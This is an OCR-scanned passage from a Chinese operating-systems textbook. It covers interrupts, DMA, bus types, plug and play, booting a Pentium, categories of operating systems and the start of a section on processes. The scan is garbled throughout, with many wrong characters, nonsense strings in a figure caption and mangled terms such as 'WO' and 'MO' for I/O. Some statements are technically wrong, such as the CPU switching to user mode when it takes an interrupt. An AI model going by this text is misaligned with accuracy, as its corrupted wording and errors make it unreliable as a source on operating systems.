要 ) ， 并 返回 。 然 后 操作 系统 将 控制 返回 给 调用 者 。 这 种 方式 称 为 忙 等 
待 (busy waiting) ， 其 缺点 是 要 占据 CPU，CPU 一 直 轮 询 设 备 直到 对 应 
的 MO 操作 完成 。 


























第 二 种 方式 是 设备 驱动 程序 局 动 设备 并 且 让 该 设备 在 操作 完成 时 发 
出 一 个 中 断 。 设 备 驱 动 程序 在 这 个 时 刻 返 回 。 操 作 系 统 接着 在 需要 时 阻 
徐 调 用 者 并 安排 其 他 工作 进行 。 当 设备 驱动 程序 检测 到 该 设备 的 操作 完 
毕 时 ， 它 友 出 一 个 中 断 通 知 操作 完成 。 














在 操作 系统 中 ， 中 断 是 非常 重要 的 ， 所 以 需要 更 具体 地 讨论 。 在 图 
1-11a 中 ， 有 一 个 WO 的 三 步 过 程 。 在 第 1 步 ， 设 备 驱 动 程序 通过 写 设备 寄 
存 器 通知 设备 控制 器 做 什么 。 然 后 ， 设 备 控制 器 启动 该 设备 。 当 设备 控 
制 器 传送 完毕 被 告知 的 要 进行 读 写 的 字 节 数量 后 ， 它 在 第 2 步 中 使 用 特 
定 的 总 线 发 信号 给 中 断 控 制 器 芯片 。 如 果 中 断 控 制 器 已 经 准备 接收 中 断 
《如 果 正 忙于 一 个 更 高 级 的 中 断 ， 也 可 能 不 接收 ) ， 它 会 在 CPU 蕊 片 的 
一 个 管 脚 上 声明 ， 这 就 是 第 3 步 。 在 第 4 步 中 ， 中 断 控 制 器 把 该 设备 的 编 
号 放 到 总 线 上 ， 这 样 CPU 可 以 读 总 线 ， 并 且 知 道 哪个 设备 刚刚 完成 了 操 
作 《〈 可 能 同时 有 许多 设备 在 运行 ) 。 
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a) b) 
图 1-11 adBaA—-M/ORSHAH PNA; bb) 中断 处 理 过 程 包括 
取 中 断 、 运 行 中 断 处 理 程序 和 返回 到 用 户 程序 


一 旦 CPU 决定 取 中 断 ， 通 滑 程序 计数 器 和 PSW 就 被 压 入 当前 堆栈 
中 ， 并 且 CPU 被 切换 到 用 户 态 。 设 备 编号 可 以 成 为 部 分 内 存 的 一 个 引 
用 ， 用 于 寻找 该 设备 中 断 处 理 程序 的 地 址 。 这 部 分 和 内存 称 为 中 断 问 量 
(interrupt vector) 。 当 中 断 处 理 程序 “中 断 设 备 的 设备 驱动 程序 的 一 部 
分 ) 开始 后 ， 它 取 走 已 入 栈 的 程序 计数 费 和 PSW， 并 保存 之 ， 然 后 查询 
设备 的 状态 。 在 中 断 处 理 程序 全 部 完成 之 后 ， 它 返回 到 先前 运行 的 用 户 
程序 中 尚未 执行 的 头 一 条 指令 。 这 些 步 又 如 图 1-11b 所 示 。 








第 三 种 方式 是 ， 为 O 使 用 一 种 特殊 的 直接 存储 器 访问 (Direct 
Memory Access, DMA) 已 片 ， 它 可 以 控制 在 内 存 和 某 些 控制 器 之 间 的 
位 流 ， 而 无 须 持 续 的 CPU 干 预 。CPU 对 DMA 蕊 片 进行 设置 ， 说 明 需 要 
传送 的 字 节 数 、 有 关 的 设备 和 内 存 地 址 以 及 操作 方向 ， 接 着 启动 








DMA。 当 DMA 心 片 完 成 时 ， 它 引发 一 个 中 断 ， 其 处 理 方 式 如 前 所 述 
有 关 DMA 和 IO 硬件 会 在 第 5 章 中 具体 讨论 。 


中 靳 经 常会 在 非常 不 合适 的 时 刻 发 生 ， 比 如 ， 在 为 一 个 中 断 程序 正 
在 运行 时 发 生 。 正 由 于 此 ，CPU 有 办 法 关闭 中 断 并 在 稍 后 再 开局 中 断 。 
在 中 断 关 闭 时 ， 任 何 已 经 发 出 中 断 的 设备 ， 可 以 继续 保持 其 中 断 信 和 号 
但 是 CPU 不 会 被 中 断 ， 直 至 中 断 再 次 局 用 为 止 。 如 果 在 中 断 关 闭 时 ， 已 
有 多 个 设备 及 出 了 中 断 ， 中 断 控 制 缆 将 决定 先 处 理 哪 个 中 断 ， 通 常 这 取 
决 于 事先 赋予 每 个 设备 的 静态 优先 级 。 最 高 优先 级 的 设备 太 得 苑 争 。 





1.3.6 ”总 线 


图 1-6 中 的 结构 在 小 型 计算 机 中 使 用 了 多 年 ， 并 也 用 在 早期 的 IBM 
PC 中 。 但 是 ， 随 着 处 理 占 和 存储 占 速 度 越 来 越 快 ， 到 了 录 个 转折 扣 
时 ， 单 总 线 (当然 还 有 IBM PC 总 线 ) 就 很 难处 理 总 线 的 交通 流量 了 ， 
只 有 放弃 。 其 结果 是 导致 其 他 的 总 线 出 现 ， 它 们 处 理 WVO 设 备 以 及 CPU 
到 存储 右 的 速度 都 更 快 。 这 种 演化 的 结果 是 ， 目 前 一 合 较 大 的 Pentium 
系统 的 结构 如 图 1-12 所 示 。 
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图 1-12 大 型 Pentium 系 统 的 结构 


图 中 的 系统 有 8 个 总 线 《〈 高 速 缓存 、 局 部 、 内 存 、PCI、SCST、 
USB、IDE 和 ISA) ， 每 个 总 线 传输 速度 和 功能 都 不 同 。 操 作 系统 必须 
了 解 所 有 总 线 的 配置 和 管理 。 有 两 个 主要 的 总 线 ， 即 早期 的 IBM PC 
ISA (Industry Standard Architecture) 总 线 和 它 的 后 继 者 PCI (Peripheral 
Component Interconnect) 总 线 。ISA 忆 线束 是 原先 的 BM PC/AT 总 线 ， 
以 8.33MHz 频 率 运 行 ， 可 并 行 传送 2 字 节 ， 最 大 速率 为 16.67MB/s。 它 还 
可 与 老式 的 慢 速 1/O 卡 向 后 兼容 。PCI 总 线 作 为 I SA 总 线 的 后 继 者 由 Intel 
公司 及 布 。 它 可 在 66MHz 频 率 运 行 ， 可 并 行 传送 8 字 节 ， 数 据 速率 为 
528MB/s。 目 前 多 数 高 速 O 设 备 采 用 PCI 总 线 。 由 于 有 大 量 的 MO 卡 采用 
PCI 总 线 ， 甚 至 许多 非 Intel 计 算 机 也 使 用 PCI 总 线 。 现 在 ， 使 用 称 为 PCI 
Express 的 PCI 总 线 升 级 版 的 新 计算 机 已 经 出 现 。 











在 这 种 配置 中 ，CPU 通 过 局 部 总 线 与 PCI 桥 芯片 对 话 ， 而 PCI 桥 攻 
通过 专门 的 存储 总 线 与 存储 器 对 话 ， 一 般 速率 为 100MHz。Pentium 系 统 
在 蕊 片上 有 1 级 高 速 缓存 ， 在 芯片 外 有 一 个 非常 大 的 2 级 高 速 缓存 ， 它 通 

过 高 速 缓存 总 线 与 CPU 连接 。 














另外 ， 在 这 个 系统 中 有 三 个 专门 的 总 线 : IDE、USB 和 SCSI。IDE 
总 线 将 诸如 磁盘 和 CD-ROM 一 类 的 外 部 设备 与 系统 相连 接 。IDE 总 线 是 
PC/AT 的 磁盘 控制 器 接口 的 副产品 ， 现 在 几乎 成 了 所 有 基于 Pentium 系 统 
的 硬盘 的 标准 ， 对 于 CD-ROM 也 经 常 是 这 样 。 





通用 串 行 总 线 (Universal Serial Bus, USB) 是 用 来 将 所 有 慢 速 WO 


设备 ， 诸 如 键盘 和 鼠标 ， 与 计算 机 连接 。 它 采用 一 种 小 型 四 针 连 接 器 ， 
其 中 两 针 为 USB 设 备 提供 电源 。USB 是 一 种 集中 式 总 线 ， 其 根 设备 每 
1ms 轮 询 一 次 MO 设备 ， 看 是 否 有 信息 收发 。USB1.0 可 以 处 理 总 计 为 

1.5MB/s 的 负载 ， 而 较 新 的 USB2.0 总 线 可 以 有 60MB/s 的 速率 。 所 有 的 
USB 设 备 共 享 一 个 USB 设 备 驱 动 器 ， 于 是 就 不 需要 为 新 的 USB 设 备 安 装 
新 设备 驱动 器 了 。 这 样 ， 无 须 重新 启动 就 可 以 给 计算 机 添加 USB 设 备 。 














SCSI (Small Computer System Interface) 总 线 是 一 种 高 速 总 线 ， 用 
在 高 速 人 硬盘 、 扫 描 仪 和 其 他 需要 较 大 市 宽 的 设备 上 。 它 最 高 可 达 
320MB/s。 自 从 其 发 布 以 来 ，SCSI 总 线 一 直 用 在 Macintosh 系 统 上 ， 在 
UNIX 和 一 些 基 于 Intel 的 系统 中 也 很 流行 





还 有 一 种 总 线 〈 图 1-12 中 没有 展示 ) 是 IEEE 1394。 有 时 ， 它 称 为 
火线 (FireWire) ， 严 格 来 说 ， 火 线 是 苹果 公司 具体 实现 1394 的 名 称 。 
与 USB 一 样 ，IEEE 1394 是 位 串 行 总 线 ， 设 计 用 于 最 快 可 达 100MB/s 的 包 
传送 中 ， 它 适合 于 将 数码 相机 和 类 似 的 多 媒体 设备 连接 到 计算 机 上 。 
IEEE 1394 与 USB 不 同 ， 不 需要 集中 式 控 制 右 





要 在 如 图 1-12 展 示 的 环境 下 工作 ， 操 作 系 统 必 须 了 解 有 些 什 么 外 部 
设备 连接 到 计算 机 上 ， 并 对 它们 进行 配置 。 这 种 需求 导致 Imtel 和 微软 设 
计 了 一 种 名 为 即 插 即 用 (plug and play) 的 MO 系统 ， 这 是 基于 一 种 首先 
被 苹果 Macintosh 实 现 的 类 似 概念 。 在 即 插 即 用 之 前 ， 每 块 JO 卡 有 一 个 
固定 的 中 断 请 求 级 别 和 用 于 其 MO 寄存 器 的 固定 地 址 ， 例 如 ， 键 盘 的 中 





断 级 别 是 1， 并 使 用 0x60 至 0x64 的 MO 地 址 ， 软 盘 控 制 器 是 中 断 6 级 并 使 
用 0x3F0 至 0x3F7 的 IO 地 址 ， 而 打印 机 是 中 断 7 级 并 使 用 0x378 至 0x37A 的 
IO 地 址 等 。 


到 目前 为 止 ， 一 切 正 党 。 比 如 ， 用 户 买 了 一 块 声卡 和 调制 解 调 卡 ， 
并 且 它 们 都 是 可 以 使 用 中 断 4 的 ， 但 此 时 ， 问 题 发 生 了 ， 两 块 卡 互 相 冲 
突 ， 结 果 不 能 在 一 起 工作 。 解 决 方案 是 在 每 块 JO 卡 上 提供 DIP 开 关 或 跳 
接 右 ， 并 指导 用 户 对 其 进行 设置 以 选择 中 断 级 别 和 IO 地 址 ， 使 其 不 会 
与 用 户 系统 的 任何 其 他 部 件 冲 突 。 那 些 热 衷 于 复杂 PC 便 件 的 十 儿 岁 的 
青少年 们 有 时 可 以 不 出 差错 地 做 这 类 工作 。 但 是 ， 没 有 人 能 够 不 出 错 。 


即 插 即 用 所 做 的 工作 是 ， 系 统 自 动 地 收集 有 关 LO 设 备 的 信息 ， 集 
中 赋予 中 断 级 别 和 IO 地 址 ， 然 后 通知 每 块 卡 所 使 用 的 数值 。 这 项 工作 
与 计算 机 的 局 动 密切 相关 ， 所 以 下 面 我 们 开始 讨论 计算 机 的 启动。 不 过 
这 不 是 件 轻松 的 工作 。 


1.3.7. 启动 计策 机 


Pentium 的 简要 启动 过 程 如 下 。 在 每 个 Pentium 上 有 一 块 双亲 板 〈 在 
政治 上 的 纠正 影响 到 计算 机 产业 之 前 ， 它 们 曾 称 为 “ 母 板 *) 。 在 双亲 板 
上 有 一 个 称 为 基本 输入 输出 系统 (Basic Input Output System, BIOS) 的 
程序 。 在 BIOS 内 有 底层 IO 软件 ， 包 括 读 键盘 、 写 屏幕 、 进 行 磁盘 IO 以 
及 其 他 过 程 。 现 在 这 个 程序 存放 在 一 块 内 速 RAM 中 ， 它 是 非 可 易 失 性 
的 ， 但 是 在 发 现 BIOS 中 有 错时 可 以 通过 操作 系统 对 它 进 行 更 新 。 











在 计算 机 启动 时 ，BIOS 开 始 运 行 。 它 首先 检查 所 安装 的 RAM 数 
量 ， 键 盘 和 其 他 基本 设备 是 否 已 安装 并 正常 啊 应 。 接 着 ， 它 开始 扫描 
ISA 和 PCI 总 线 并 找 出 连 在 上 面 的 所 有 设备 。 其 中 有 些 设备 是 典型 的 遗留 
设备 〈 即 在 即 插 即 用 发 明之 前 设计 的 ) ， 并 且 有 固定 的 中 断 级 别 和 IO 
地 址 (也 许 能 用 在 WO 卡 上 的 开关 和 跳 接 器 设置 ， 但 是 不 能 被 操作 系统 
修改 ) 。 这 些 设备 被 记录 下 来 。 即 插 即 用 设备 也 被 记录 下 来 。 如 果 现 有 
的 设备 和 系统 上 一 次 启动 时 的 设备 不 同 ， 则 配置 新 的 设备 。 





然后 ，BIOS 通 过 尝试 存储 在 CMOS 存 储 器 中 的 设备 清单 决定 启动 设 
备 。 用 户 可 以 在 系统 刚 启 动 之 后 进入 一 个 BIOS 配 置 程序 ， 对 设备 清单 
进行 修改 。 典 型 地 ， 如 果 存 在 软盘 ， 则 系统 试图 从 软盘 启动 。 如 果 失 败 
则 试用 CD-ROM， 看 看 是 否 有 可 启动 CD-ROM 存 在 。 如 果 软 盘 和 CD- 























ROM 都 没有 ， 系 统 从 硬盘 启动。 局 动 设备 上 的 第 一 个 而 区 被 读 入 内 存 
并 执行 。 这 个 局 面 中 包含 一 个 对 保存 在 局 动 届 面 末尾 的 分 区 表 检 查 的 程 
序 ， 以 确定 哪个 分 区 是 活动 的 。 然 后 ， 从 该 分 区 读 入 第 二 个 局 动 装载 模 
块 。 来 日 活动 分 区 的 这 个 装载 模块 被 读 入 操作 系统 ， 并 局 动 之 。 








然后 ， 操 作 系 统 询问 BIOS， 以 获得 配置 信息 。 对 于 每 种 设备 ， 系 
统 检查 对 应 的 设备 驱动 程序 是 否 存 在 。 如 果 没 有 ， 系 统 要 求 用 户 插入 含 
有 该 设备 驱动 程序 的 CD-ROM 《由 设备 供应 丙 提供 ) 。 一 旦 有 了 全 部 的 
设备 驱动 程序 ， 操 作 系 统 就 将 它们 调 入 内 核 。 然 后 初始 化 有 关 表 格 ， 创 
建 需 要 的 任何 背景 进程 ， 并 在 每 个 终端 上 局 动 登录 程序 或 GUI。 








14 操作 系统 大 观 园 


操作 系统 已 经 存在 了 半 个 多 世纪 。 在 这 段 时 期 内 ， 出 现 了 各 种 类 型 
的 操作 系统 ， 并 不 是 所 有 这 些 操 作 系 统 都 很 知名 。 本 市 中 ， 我 们 将 简要 
地 介绍 其 中 的 9 个 。 在 本 书 的 后 面 ， 我 们 还 将 回顾 这 些 系统 。 


1.4.1 大 型 机 操作 系统 


在 操作 系统 的 高 端 是 用 于 大 型 机 的 操作 系统 ， 这 些 房间 般 大 小 的 计 
算 机 仍然 可 以 在 一 些 大 型 公司 的 数据 中 心中 见 到 。 这 些 计算 机 与 个 人 计 
算 机 的 主要 差别 是 其 1/O 处 理 能 力 。 一 台 拥 有 1000 个 磁盘 和 上 百 万 吉 字 
节 数 据 的 大 型 机 是 很 正常 的 ， 如 果 有 这 样 的 特性 的 一 台 个 人 计算 机 会 使 
朋友 们 很 羡慕 。 大 型 机 也 在 高 端的 web 服务 器 、 大 型 电子 商务 服务 站 点 
和 事务 -事务 交易 服务 器 上 有 某 种 程度 的 复活 。 











用 于 大 型 机 的 操作 系统 主要 用 于 面 癌 多 个 作业 的 同时 处 理 ， 多 数 这 
样 的 作业 需要 巨大 的 IO 能 力 。 系 统 主要 提供 三 类 服务 : 批 处 理 、 事 务 
处 理 和 分 时 处 理 。 批 处 理 系 统 处 理 不 需要 交互 式 用 户 干预 的 周期 性 作 
业 。 保 险 公司 的 索赔 处 理 或 连锁 商店 的 销售 报告 通 第 束 是 以 批 处 理 方式 
完成 的 。 事 务 处 理 系统 负责 大 量 小 的 请 求 ， 例 如 ， 银 行 的 文 票 处理 或 航 
班 预订 。 每 个 业务 量 都 很 小 ， 但 是 系统 必须 每 秒 处 理 成 百 上 于 个 业务 。 





分 时 系统 允许 多 个 远程 用 户 同时 在 计算 机 上 运行 作业 ， 诸 如 在 大 型 数据 
库 上 的 查询 。 这 些 功 能 是 密切 相关 的 ， 大 型 机 操作 系统 通常 完成 所 有 这 
些 功 能 。 大 型 机 操作 系统 的 一 个 例子 是 OS/390 (OS/360 的 后 继 版 本 )。 
但 是 ， 大 型 机 操作 系统 正在 逐渐 被 诸如 Linux 这 类 UNIX 的 变 体 所 蔡 代 。 





1.4.2 ”服务 器 操作 系统 


下 一 个 层次 是 服务 器 操作 系统 。 它 们 在 服务 器 上 运行 ， 服 务 器 可 以 
是 大 型 的 个 人 计算 机 、 工 作 站 ， 甚 至 是 大 型 机 。 它 们 通过 网 络 同时 为 若 
干 个 用 户 服 务 ， 并 且 人 允许 用 户 共享 硬件 和 软件 资源 。 服 务 器 可 提供 打印 
服务 、 文 件 服务 或 Web 服 务 。Internet 服 务 商 们 运行 着 许多 台 服 务 器 机 
器 ， 以 支持 他 们 的 用 户 ， 使 Web 站 点 保存 Web 页 面 并 处 理 进 来 的 请 求 。 
典型 的 服务 器 操作 系统 有 Solaris、FreeBSD、Linux 和 Windows Server 
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1.4.3 ”多 处 理 器 操作 系统 











一 种 获得 大 量 联 合计 算 能 力 的 操作 系统 ， 其 越 来 越 闸 用 的 方式 是 将 
多 个 CPU 连 接 成 单个 的 系统 。 依 据 连接 和 共享 方式 的 不 同 ， 这 些 系 统称 
为 并 行 计 算 机 、 多 计算 机 或 多 处 理 器 。 它 们 需要 专门 的 操作 系统 ， 不 过 
通 第 采用 的 操作 系统 是 配 有 通信 、 连 接 和 一 致 性 等 专门 功能 的 服务 右 操 
作 系 统 的 变 体 。 


个 人 计算 机 中 近来 出 现 了 多 核 必 片 ， 所 以 党 规 的 台式 机 和 笔记 本 电 
脑 操 作 系 统 也 开始 与 小 规模 的 多 处 理 器 打交道 ， 而 核 的 数量 正在 与 时 俱 
进 。 幸 运 的 是 ， 由 于 先前 多 年 的 研究 ， 已 经 具备 不 少 关 于 多 处 理 器 操作 
系统 的 知识 ， 将 这 些 知识 运用 到 多 核 处 理 器 系统 中 应 该 不 存在 困难 。 难 
点 在 于 要 有 能 够 运用 所 有 这 些 计算 能 力 的 应 用 。 许 多 主流 操作 系统 ， 包 
括 Windows 和 Linux， 都 可 以 运行 在 多 核 处 理 器 上 。 











1.4.4 个 人 计算 机 操作 系统 


接着 一 类 是 个 人 计算 机 操作 系统 。 现 代 个 人 计算 机 操作 系统 都 支持 
多 道 程 序 处 理 ， 在 启动 时 ， 通 常 有 十 多 个 程序 开始 运行 。 它 们 的 功能 是 
为 单个 用 户 提 供 良好 的 支持 。 这 类 系统 广泛 用 于 字 人 处理、 电子 表格 、 游 
戏 和 Internet 访 问 。 常 见 的 例子 是 Linux、FreeBSD、Windows Vista 和 
Macintosh 操 作 系 统 。 个 人 计算 机 操作 系统 是 如 此 地 广为人知 ， 所 以 不 
需要 再 做 介绍 了 。 事 实 上 ， 许 多 人 甚至 不 知道 还 有 其 他 的 操作 系统 存 
TE 


145 掌上 计算 机 操作 系统 


随 着 系统 越 来 越 小 型 化 ， 我 们 看 到 了 掌上 计算 机 。 掌 上 计算 机 或 者 
个 人 数字 助理 (Personal Digital Assistant, PDA) 是 一 种 可 以 装 进 衬衫 
口袋 的 小 型 计算 机 ， 它 们 可 以 实现 少量 的 功能 ， 诸 如 电子 地 址 短 和 记事 
本 之 类 。 而 且 ， 除 了 键盘 和 屏幕 之 外 ， 许 多 移动 电话 与 PDA 几 乎 没有 差 
别 。 在 实际 效果 上 ，PDA 和 移动 电话 已 经 在 逐渐 融合 ， 其 差别 主要 在 于 
大 小 、 重 量 以 及 用 户 界 面 等 方面 。 这 些 设 备 几 乎 都 是 基于 带 有 保护 模式 
的 32 位 CPU， 并 且 运 行 最 尖端 的 操作 系统 。 























运行 在 这 些 掌上 设备 上 的 操作 系统 正在 变 得 越 来 越 复 杂 ， 它 们 有 能 
力 处 理 移动 电话 、 数 码 照 相 以 及 其 他 功能 。 多 数 设备 还 能 运行 第 三 方 的 
应 用 。 事 实 上 ， 其 中 有 些 设备 开始 采用 十 年 前 的 个 人 操作 系统 。 掌 上 设 
备 和 PC 机 之 间 的 主要 差别 是 ， 前 者 没有 若干 GB 的 、 不 断 变 化 的 硬盘 。 
在 党 上 设备 上 最 主要 的 两 个 操作 系统 是 Symbian OS 和 Plam OS. 











1.4.6 ”上航 入 式 操 作 系 统 


嵌入 式 系统 在 用 来 控制 设备 的 计算 机 中 运行 ， 这 种 设备 不 是 一 般 意 
义 上 的 计算 机 ， 并 且 不 允许 用 户 安 装 软 件 。 典 型 的 例子 有 和 微波炉、 电视 
机 、 汽 车 、DVD 和 刻录 机 、 移 动 电话 以 及 MP3 播 放 器 一 类 的 设备 。 区 别 髓 
入 式 系统 与 掌上 设备 的 主要 特征 是 ， 不 可 信 的 软件 肯定 不 能 在 诡 入 式 系 
统 上 运行 。 用户 不 能 给 上 自己 的 微波 炉 下 载 新 的 应 用 程序 一 一 所 有 的 软件 
都 保存 在 ROM 中 。 这 意味 大 在 应 用 程序 之 间 不 存在 保护 ， 这 样 系统 就 
获得 了 某 种 简化 。 在 这 个 领域 中 ， 主 要 的 艇 入 式 操作 系统 有 QNX 和 
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VxWorks 等 。 














1.4.7 ” 传 感 融 市 反 操 作 系 统 


有 许多 用 途 需 要 配置 微小 传 感 占 节点 网 络 。 这 些 节 点 是 一 种 可 以 外 
此 通信 并 且 使 用 无 线 通 信 基 站 的 微型 计算 机 。 这 类 传 感 露 网络 可 以 用 于 
建筑 物 周边 保护 、 国 土 边界 保 卫 、 和 森林 火灾 探测 、 气 象 预 测 用 的 温度 和 
降水 测量 、 战 场 上 政 方 运动 的 信息 收集 等 。 


传感器 是 一 种 内 建 有 无 线 电 的 电池 驱动 的 小 型 计算 机 。 它 们 能 源 有 
限 ， 必 须 长 时 间 工 作 在 无 人 的 户外 环境 中 ， 通 种 是 恶劣 的 环境 条 件 下 。 
其 网 络 必须 足够 健壮 ， 以 允许 个 别 节 后 失 效 。 随 着 电池 开始 耗 尽 ， 这 种 
失效 节 扣 会 不 断 增加 。 


每 个 传感器 节点 是 一 个 配 有 CPU、RAM、ROM 以 及 一 个 或 多 个 环 
境 传感器 的 实 实在 在 的 计算 机 。 节 点 上 运行 一 个 小 型 但 是 真实 的 操作 系 
统 ， 通 常 这 个 操作 系统 是 事件 驱动 的 ， 可 以 响应 外 部 事件 ， 或 者 基于 内 
部 时 钟 进行 周期 性 的 测量 。 该 操作 系统 必须 小 且 简 单 ， 因 为 这 些 节 点 的 
RAM 很 小 ， 而 且 电 池 寿 命 是 一 个 重要 问题 。 另 外 ， 和 机 入 式 系 统一 
样 ， 所 有 的 程序 是 预先 装载 的 ， 用 户 不 会 突然 启动 从 Internet 上 下 载 的 程 
序 ， 这 样 就 使 得 设计 大 为 简化 。TinyOS 是 一 个 用 于 传感器 节点 的 知名 操 
作 系 统 。 








14.8 实时 操作 系统 


另 一 类 操作 系统 是 实时 操作 系统 。 这 些 系统 的 特征 是 将 时 间作 为 关 
键 参 数 。 例 如 ， 在 工业 过 程控 制 系统 中 ， 工 三 中 的 实时 计算 机 必须 收集 
生产 过 程 的 数据 并 用 有 关 数 据 控 制 机 器 。 通 常 ， 系 统 还 必须 满足 严格 的 
最 终 时 限 。 例 如 ， 汽 车 在 装配 线 上 移动 时 ， 必 须 在 限定 的 时 间 内 进行 规 
定 的 操作 。 如 果 焊 接 机 器 人 焊接 得 太 早 或 太 迟 ， 都 会 毁坏 汽车 。 如 果 茶 
个 动作 必须 绝对 地 在 规定 的 时 刻 《〈 或 规定 的 时 间 范 围 ) 发 生 ， 这 就 是 便 
实时 系统 。 可 以 在 工业 过 程控 制 、 民 用 航空 、 军 事 以 及 类 似 应 用 中 看 到 
很 多 这 样 的 系统 。 这 些 系 统 必须 所 供 绝 对 保证 ， 让 茶 个 特定 的 动作 在 给 
定 的 时 间 内 完成 。 


为 一 类 实时 系统 是 软 实 时 系统 ， 在 这 种 系统 中 ， 侦 尔 违反 最 终 时 限 
古 不 希望 的 ， 但 可 以 接受 ， 并 且 不 会 引起 任何 永久 性 的 损害 。 数 字音 频 
或 多 媒体 系统 就 是 这 类 系统 。 数 字 电 话 也 是 软 实时 系统 。 





由 于 在 (人 硬 ) 实时 系统 中 满足 严格 的 时 限 是 关键 ， 所 以 操作 系统 就 
古 一 个 简单 的 与 应 用 程序 链接 的 库 ， 各 个 部 分 必须 桶 密 耦合 并 且 役 此 之 
间 没 有 保护 。 这 种 类 型 的 实时 系统 的 例子 有 e-Cos。 











掌上 、 购 入 式 以 及 实时 系统 的 分 类 之 间 有 不 少 是 彼此 重 全 的。 几乎 
所 有 这 些 系 统 至 少 存 在 茶 种 软 实 时 情景 。 馈 入 式 和 实时 系统 只 运行 系统 





设计 师 安装 的 软件 用 户 不 能 添加 自己 的 软件 ， 这 样 就 使 得 保护 工作 很 容 
易 。 和 擎 上 和 明 入 式 系统 是 为 普通 消费 者 使 用 的 ， 而 实时 系统 则 更 多 用 于 
工业 领域 。 无 论 怎样 ， 这 些 系 统 确实 存在 一 些 共同 点 。 





1.4.9 智能 卡 操作 系统 


最 小 的 操作 系统 运行 在 智能 卡 上 。 智 能 卡 是 一 种 包含 有 一 块 CPU 攻 
片 的 信用 卡 。 它 有 非常 严格 的 运行 能 耗 和 存储 空间 的 限制 。 其 中 ， 有 些 
智能 卡 只 具有 单项 功能 ， 诺 如 电子 文 付 ， 但 是 其 他 的 智能 卡 则 可 在 同一 
块 卡 中 拥有 多 项 功能 。 它 们 是 专用 的 操作 系统 。 








有 些 智 能 卡 是 面 癌 Java 的 。 其 含义 是 在 智能 卡 的 ROM 中 有 一 个 Java 
虚拟 机 (Java Virtual Machine, JVM) 解释 器 。Java 小 程序 被 下 载 到 卡 
中 并 由 JVM 解 释 器 解释 。 有 些 卡 可 以 同时 处 理 多 个 Java 小 程序 ， 这 就 是 
多 道 程序 ， 并 且 需 要 对 它们 进行 调度 。 在 两 个 或 多 个 小 程序 同时 运行 
时 ， 资 源 管 理 和 保护 就 成 为 突出 的 问题 。 这 些 问题 必须 由 卡 上 的 操作 系 
统 〈 通 常 是 非常 原始 的 ) 处 理 。 





1.5 操作 系统 概念 


多 数 操作 系统 都 使 用 某 些 基本 概念 和 抽象 ， 诸 如 进程 、 地 址 空间 以 
及 文件 等 ， 它 们 是 需要 理解 的 中 心 。 作 为 引 论 ， 在 下 面 的 几 节 中 ， 我 们 
将 较为 简要 地 分 析 这 些 基 本 概念 中 的 一 些 成 分 。 在 本 书 的 后 面 ， 我 们 将 
详细 地 讨论 它们 。 为 了 说 明 这 些 概念 ， 我 们 有 时 将 使 用 示例 ， 这 些 示 例 
通常 源 自 UNIX。 不 过 ， 类 似 的 例子 在 其 他 的 操作 系统 中 也 明显 地 存 
人 在， 进而， 我 们 将 在 第 11 章 中 具体 讨论 Windows Vista. 





1.5.1 ”进程 


在 所 有 操作 系统 中 ， 一 个 重要 的 概念 是 进程 (process) 。 进 程 本 质 
上 是 正在 执行 的 一 个 程序 。 与 每 个 进程 相关 的 是 进程 的 地 址 空间 
(address space) ， 这 是 从 某 个 最 小 值 的 存储 位 置 (通常 是 零 ) 到 某 个 
最 大 值 存储 位 置 的 列表 。 在 这 个 地 址 空间 中 ， 进 程 可 以 进行 读 写 。 该 地 
址 空间 中 存放 有 可 执行 程序 、 程 序 的 数据 以 及 程序 的 堆栈 。 与 每 个 进程 
相关 的 还 有 资源 集 ， 通 常 包括 寄存 器 《含有 程序 计数 器 和 堆栈 指针 ) 、 
打开 文件 的 清单 、 突 出 的 报警 、 有 关 进 程 清 单 ， 以 及 运行 该 程序 所 需要 
的 所 有 其 他 信息 。 进 程 基本 上 是 容纳 运行 一 个 程序 所 需要 所 有 信息 的 容 
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进程 的 概念 将 在 第 2 章 详 细 讨论 ， 不 过 ， 对 进程 建立 一 种 直观 感 沉 
的 最 便利 方式 是 分 析 一 个 分 时 系统 。 用 户 会 启动 一 个 视频 编辑 程序 ， 并 
指令 它 按照 东 个 格式 转换 一 小 时 的 视频 〈 有 时 会 伦 费 数 小 时 ) ， 然 后 离 
开 去 Web 上 冲浪 。 同 时 ， 一 个 被 周期 性 唤醒 ， 用 来 检查 进来 的 e-mail 的 
后 台 进 程 会 开始 运行 。 这 样 ， 我 们 束 有 了 “至 少 ) 三 个 活动 进程 :视频 
编辑 右 、Web 浏 虎 右 以 及 e-mail 接 收 右 。 操 作 系统 周期 性 地 挂 起 一 个 进 
程 然后 局 动 运行 为 一 个 进程 。 例 如 ， 在 过 去 的 一 秒 钟 内 ， 第 一 个 进程 已 
使 用 完 分 配给 它 的 时 间 片 。 





一 个 进程 暂时 被 这 样 挂 起 后 ， 在 随后 的 茶 个 时 刻 里 ， 该 进程 再 次 启 
动 时 的 状态 必须 与 先前 暂停 时 完全 相同 ， 这 就 意味 看 在 挂 起 时 该 进程 的 
所 有 信息 部 要 保存 下 来 。 例 如 ， 为 了 同时 读 入 信息 ， 进 程 打开 了 奋 干 文 
件 。 同 每 个 被 打开 文件 有 关 的 是 指 问 当前 位 置 的 指针 《“ 即 下 一 个 将 读 出 
的 字 节 或 记录 ) 。 在 一 个 进程 暂时 被 挂 起 时 ， 所 有 这 些 指针 都 必须 保存 
起 来 ， 这 样 在 该 进程 重新 局 动 之 后 ， 所 执行 的 读 调 用 才能 读 到 正确 的 数 
据 。 在 许多 操作 系统 中 ， 与 一 个 进程 有 关 的 所 有 信息 ， 除 了 该 进程 自身 
地 址 空间 的 内 容 以 外 ， 均 存放 在 操作 系统 的 一 张 表 中 ， 称 为 进程 表 
(process table〉， 进 程 表 是 数组 (或 链表 ) 结构 ， 当 前 存在 的 每 个 进程 
都 要 占用 其 中 一 项 。 























所 以 ,一 个 〈( 挂 起 的 ) 进程 包括 : 进程 的 地 址 空间 ， 往 往 称 作 磁 忌 
映像 (core image， 纪 念 过 去 年 代 中 使 用 的 磁 必 存储 器 ) ， 以 及 对 应 的 


进程 表 项 ， 其 中 包括 寄存 需 以 及 稍 后 重 局 动 该 进程 所 需要 的 许多 其 他 信 


=| 
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与 进程 管理 有 关 的 最 关键 的 系统 调用 是 那些 进行 进程 创建 和 进程 终 
止 的 系统 调用 。 考 虑 一 个 典型 的 例子 。 有 一 个 称 为 命令 解释 絮 
(command interpreter) 或 shell 的 进程 从 终端 上 该 命令 。 此 时 ， 用 户 刚 
